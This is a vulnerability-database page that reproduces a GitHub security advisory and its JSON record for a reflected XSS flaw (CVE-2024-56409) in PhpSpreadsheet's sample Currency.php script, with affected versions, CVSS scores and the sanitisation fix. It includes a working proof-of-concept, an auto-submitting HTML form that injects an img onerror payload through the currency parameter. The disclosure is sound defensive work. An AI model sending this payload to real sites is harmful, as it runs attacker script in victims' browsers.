GHSA-J2XG-CJCX-4677

Vulnerability from github – Published: 2025-01-03 17:06 – Updated: 2025-03-06 18:18
VLAI?
Summary
PhpSpreadsheet allows unauthorized Reflected XSS in Currency.php file
Details

Unauthorized Reflected XSS in Currency.php file

Product: Phpspreadsheet Version: version 3.6.0 CWE-ID: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') CVSS vector v.3.1: 8.2 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N) CVSS vector v.4.0: 8.3 (AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L) Description: using the /vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Currency.php script, an attacker can perform XSS-type attack Impact: executing arbitrary JavaScript code in the browser Vulnerable component: the /vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Currency.php file Exploitation conditions: an unauthorized user Mitigation: sanitization of the currency variable Researcher: Aleksey Solovev (Positive Technologies)

Research

The researcher discovered zero-day vulnerability Unauthorized Reflected Cross-Site Scripting (XSS) (in Currency.php file) in Phpspreadsheet.

There is no sanitization in the /vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Currency.php file, which leads to the possibility of a XSS attack. Strings are formed using the currency parameter without sanitization, controlled by an attacker.

fig9

Figure 9. A fragment of the query in which a string and a parameter are formed without sanitization

An attacker can prepare a special HTML form that will be automatically sent to the vulnerable scenario.

Listing 5. HTML form that demonstrates the exploitation of the XSS vulnerability

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://192.***.***.***/vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Currency.php" method="POST">
      <input type="hidden" name="number" value="1234&#46;5678" />
      <input type="hidden" name="currency" value="&#36;&apos;&quot;&lt;img&#32;src&#61;1&#32;onerror&#61;alert&#40;&#41;&gt;" />
      <input type="hidden" name="decimals" value="2" />
      <input type="hidden" name="position" value="1" />
      <input type="hidden" name="spacing" value="0" />
      <input type="hidden" name="submit" value="Display&#32;Mask" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

After sending the script provided in Listing 5, the XSS vulnerability is exploited. Figure 10 shows the execution of arbitrary JavaScript code during the submission of a POST form.

fig10

Figure 10. Executing arbitrary JavaScript code

Credit

This vulnerability was discovered by Aleksey Solovev (Positive Technologies)

Severity ?
7.1 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N
8.3 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.7.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.29.6"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.29.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.1.5"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "2.1.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.3.4"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.2.0"
            },
            {
              "fixed": "2.3.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpexcel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-56409"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-01-03T17:06:51Z",
    "nvd_published_at": "2025-01-03T17:15:08Z",
    "severity": "HIGH"
  },
  "details": "# Unauthorized Reflected XSS in `Currency.php` file\n\n**Product**: Phpspreadsheet\n**Version**: version 3.6.0\n**CWE-ID**: CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\n**CVSS vector v.3.1**: 8.2 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N)\n**CVSS vector v.4.0**: 8.3 (AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L)\n**Description**: using the `/vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Currency.php` script, an attacker can perform XSS-type attack\n**Impact**: executing arbitrary JavaScript code in the browser\n**Vulnerable component**: the `/vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Currency.php` file\n**Exploitation conditions**: an unauthorized user\n**Mitigation**: sanitization of the `currency` variable\n**Researcher**: Aleksey Solovev (Positive Technologies)\n\n# Research\n\nThe researcher discovered zero-day vulnerability Unauthorized Reflected Cross-Site Scripting (XSS) (in `Currency.php` file) in Phpspreadsheet.\n\nThere is no sanitization in the `/vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Currency.php` file, which leads to the possibility of a XSS attack.\nStrings are formed using the `currency` parameter without sanitization, controlled by an attacker.\n\n![fig9](https://github.com/user-attachments/assets/dfac3fbf-de42-42af-8163-b76f0c54da6c)\n\n*Figure 9.  A fragment of the query in which a string and a parameter are formed without sanitization*\n\nAn attacker can prepare a special HTML form that will be automatically sent to the vulnerable scenario.\n\n*Listing 5. HTML form that demonstrates the exploitation of the XSS vulnerability*\n\n```\n\u003chtml\u003e\n  \u003c!-- CSRF PoC - generated by Burp Suite Professional --\u003e\n  \u003cbody\u003e\n    \u003cform action=\"https://192.***.***.***/vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Currency.php\" method=\"POST\"\u003e\n      \u003cinput type=\"hidden\" name=\"number\" value=\"1234\u0026#46;5678\" /\u003e\n      \u003cinput type=\"hidden\" name=\"currency\" value=\"\u0026#36;\u0026apos;\u0026quot;\u0026lt;img\u0026#32;src\u0026#61;1\u0026#32;onerror\u0026#61;alert\u0026#40;\u0026#41;\u0026gt;\" /\u003e\n      \u003cinput type=\"hidden\" name=\"decimals\" value=\"2\" /\u003e\n      \u003cinput type=\"hidden\" name=\"position\" value=\"1\" /\u003e\n      \u003cinput type=\"hidden\" name=\"spacing\" value=\"0\" /\u003e\n      \u003cinput type=\"hidden\" name=\"submit\" value=\"Display\u0026#32;Mask\" /\u003e\n      \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n    \u003c/form\u003e\n    \u003cscript\u003e\n      history.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027);\n      document.forms[0].submit();\n    \u003c/script\u003e\n  \u003c/body\u003e\n\u003c/html\u003e\n```\n\nAfter sending the script provided in Listing 5, the XSS vulnerability is exploited. Figure 10 shows the execution of arbitrary JavaScript code during the submission of a POST form. \n\n\u003cimg width=\"428\" alt=\"fig10\" src=\"https://github.com/user-attachments/assets/2be8c94b-03ac-40d9-aa7a-9d326eb79335\" /\u003e\n\n*Figure 10. Executing arbitrary JavaScript code*\n\n# Credit\nThis vulnerability was discovered by **Aleksey Solovev (Positive Technologies)**",
  "id": "GHSA-j2xg-cjcx-4677",
  "modified": "2025-03-06T18:18:55Z",
  "published": "2025-01-03T17:06:51Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-j2xg-cjcx-4677"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56409"
    },
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/700a80346be269af668914172bc6f4521982d0b4"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "PhpSpreadsheet allows unauthorized Reflected XSS in Currency.php file"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.